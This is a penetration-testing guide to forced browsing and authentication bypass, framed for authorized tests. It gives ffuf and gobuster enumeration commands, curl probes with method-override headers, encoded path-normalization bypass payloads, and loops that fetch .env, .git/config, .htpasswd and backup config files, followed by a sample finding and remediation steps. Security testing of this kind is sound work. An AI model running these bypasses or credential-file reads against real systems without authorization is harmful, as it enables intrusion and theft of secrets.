Bypassing Authentication with Forced Browsing
When to Use
- During authorized penetration tests to discover hidden or unprotected administrative pages
- When testing whether authentication is consistently enforced across all application endpoints
- For identifying backup files, configuration files, and debug interfaces left exposed in production
- When assessing access control on API endpoints that should require authentication
- During security audits to validate that all sensitive resources enforce session validation
Prerequisites
- Authorization: Written penetration testing agreement covering directory enumeration
- ffuf: Fast web fuzzer (
go install github.com/ffuf/ffuf/v2@latest) - Gobuster: Directory brute-force tool (
apt install gobuster) - Burp Suite: For intercepting and analyzing requests and responses
- Wordlists: SecLists collection (
git clone https://github.com/danielmiessler/SecLists.git) - Target access: Network connectivity and valid test credentials for authenticated comparison
Workflow
Step 1: Enumerate Hidden Directories and Files
Use ffuf or Gobuster to discover paths not linked in the application's navigation.
# Directory enumeration with ffuf
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-mc 200,301,302,403 \
-fc 404 \
-o results-dirs.json -of json \
-t 50 -rate 100
# File enumeration with common extensions
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
-e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env \
-mc 200,301,302,403 \
-fc 404 \
-o results-files.json -of json \
-t 50 -rate 100
# Gobuster for directory enumeration
gobuster dir -u https://target.example.com \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-s "200,204,301,302,307,403" \
-x php,asp,aspx,jsp,html \
-o gobuster-results.txt \
-t 50
Step 2: Discover Administrative and Debug Interfaces
Target common administrative paths and debug endpoints.
# Admin panel enumeration
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc 200,301,302 \
-t 50 -rate 100
# Common admin paths to check manually:
# /admin, /administrator, /admin-panel, /wp-admin
# /cpanel, /phpmyadmin, /adminer, /manager
# /console, /debug, /actuator, /swagger-ui
# /graphql, /graphiql, /.env, /server-status
# API endpoint discovery
ffuf -u https://target.example.com/api/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
-mc 200,201,204,301,302,401,403 \
-fc 404 \
-o api-results.json -of json
# Check for Spring Boot Actuator endpoints
for endpoint in env health info beans configprops mappings trace; do
curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n" \
"https://target.example.com/actuator/$endpoint"
done
Step 3: Test Authentication Enforcement on Discovered Endpoints
Compare responses between unauthenticated and authenticated requests.
# Test without authentication
curl -s -o /dev/null -w "%{http_code}" \
"https://target.example.com/admin/dashboard"
# Test with valid session cookie
curl -s -o /dev/null -w "%{http_code}" \
-b "session=valid_session_token_here" \
"https://target.example.com/admin/dashboard"
# Automated check: compare response sizes
# Unauthenticated request
curl -s "https://target.example.com/admin/users" | wc -c
# Authenticated request
curl -s -b "session=valid_token" \
"https://target.example.com/admin/users" | wc -c
# If both return similar content, authentication is not enforced
# Test with Burp Intruder: send a list of discovered URLs
# without cookies and flag any 200 responses
Step 4: Test HTTP Method-Based Authentication Bypass
Some applications only enforce authentication for specific HTTP methods.
# Test different HTTP methods on protected endpoints
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do
echo -n "$method: "
curl -s -o /dev/null -w "%{http_code}" \
-X "$method" "https://target.example.com/admin/settings"
done
# Test HTTP method override headers
curl -s -o /dev/null -w "%{http_code}" \
-X POST \
-H "X-HTTP-Method-Override: GET" \
"https://target.example.com/admin/settings"
curl -s -o /dev/null -w "%{http_code}" \
-H "X-Original-Method: GET" \
-H "X-Rewrite-URL: /admin/settings" \
"https://target.example.com/"
Step 5: Test Path Traversal and URL Normalization Bypass
Exploit URL parsing differences to bypass path-based authentication rules.
# Path normalization bypass attempts
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/ADMIN/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/./dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/public/../admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin%2fdashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/;/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin;anything/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/.;/admin/dashboard"
# Double URL encoding
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/%2561dmin/dashboard"
# Trailing characters
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard/"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard.json"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard%00"
Step 6: Discover Backup and Configuration Files
Search for sensitive files inadvertently exposed on the web server.
# Backup file discovery
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
-e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip \
-mc 200 -t 50 -rate 100
# Common sensitive files
for file in .env .git/config .git/HEAD .svn/entries \
web.config wp-config.php.bak config.php.old \
database.yml .htpasswd server-status phpinfo.php \
robots.txt sitemap.xml crossdomain.xml; do
status=$(curl -s -o /dev/null -w "%{http_code}" \
"https://target.example.com/$file")
if [ "$status" != "404" ]; then
echo "FOUND ($status): $file"
fi
done
# Git repository exposure check
curl -s "https://target.example.com/.git/HEAD"
# If this returns "ref: refs/heads/main", the git repo is exposed
Key Concepts
| Concept | Description |
|---|---|
| Forced Browsing | Directly accessing URLs that are not linked but exist on the server |
| Directory Enumeration | Brute-forcing directory and file names against a wordlist to discover hidden content |
| Authentication Bypass | Accessing protected resources without valid credentials due to missing access checks |
| Path Normalization | Exploiting differences in how web servers and application frameworks parse URL paths |
| Method-based Bypass | Using alternative HTTP methods (PUT, DELETE) that may not have authentication checks |
| Information Disclosure | Exposure of sensitive configuration files, backups, or debug interfaces |
| Defense in Depth | Layered security controls where authentication is enforced at multiple levels |
Tools & Systems
| Tool | Purpose |
|---|---|
| ffuf | Fast web fuzzer for directory, file, and parameter enumeration |
| Gobuster | Directory and DNS brute-forcing tool written in Go |
| Feroxbuster | Recursive content discovery tool with automatic recursion |
| DirBuster | OWASP Java-based directory brute-force tool with GUI |
| Burp Suite | HTTP proxy for request interception and automated scanning |
| SecLists | Comprehensive collection of wordlists for security testing |
Common Scenarios
Scenario 1: Exposed Admin Panel
An admin panel at /admin/ is only hidden by not being linked in the navigation. Direct URL access reveals the full administrative interface without any authentication check.
Scenario 2: Unprotected API Endpoints
API endpoints at /api/v1/users and /api/v1/settings require authentication in the frontend application but the backend API does not enforce session validation, allowing unauthenticated direct access.
Scenario 3: Backup File Containing Credentials
A developer left config.php.bak on the production server. This backup file contains database credentials in plaintext, discovered through extension-based enumeration.
Scenario 4: Spring Boot Actuator Exposure
The /actuator/env endpoint is exposed without authentication, revealing environment variables including database connection strings, API keys, and secrets.
Output Format
## Forced Browsing / Authentication Bypass Finding
**Vulnerability**: Missing Authentication on Administrative Interface
**Severity**: Critical (CVSS 9.1)
**Location**: /admin/dashboard (GET, no authentication required)
**OWASP Category**: A01:2021 - Broken Access Control
### Discovered Unprotected Resources
| Path | Status | Auth Required | Content |
|------|--------|---------------|---------|
| /admin/dashboard | 200 | No | Full admin panel |
| /admin/users | 200 | No | User management |
| /actuator/env | 200 | No | Environment variables |
| /config.php.bak | 200 | No | Database credentials |
| /.git/HEAD | 200 | No | Git repository metadata |
### Impact
- Unauthenticated access to administrative functions
- Ability to create, modify, and delete user accounts
- Exposure of database credentials and API keys
- Full source code disclosure via exposed Git repository
### Recommendation
1. Implement authentication checks at the server/middleware level for all admin routes
2. Remove backup files, debug endpoints, and version control metadata from production
3. Configure web server to deny access to sensitive file extensions (.bak, .old, .env, .git)
4. Implement IP-based access restrictions for administrative interfaces
5. Use a reverse proxy to restrict access to internal-only endpoints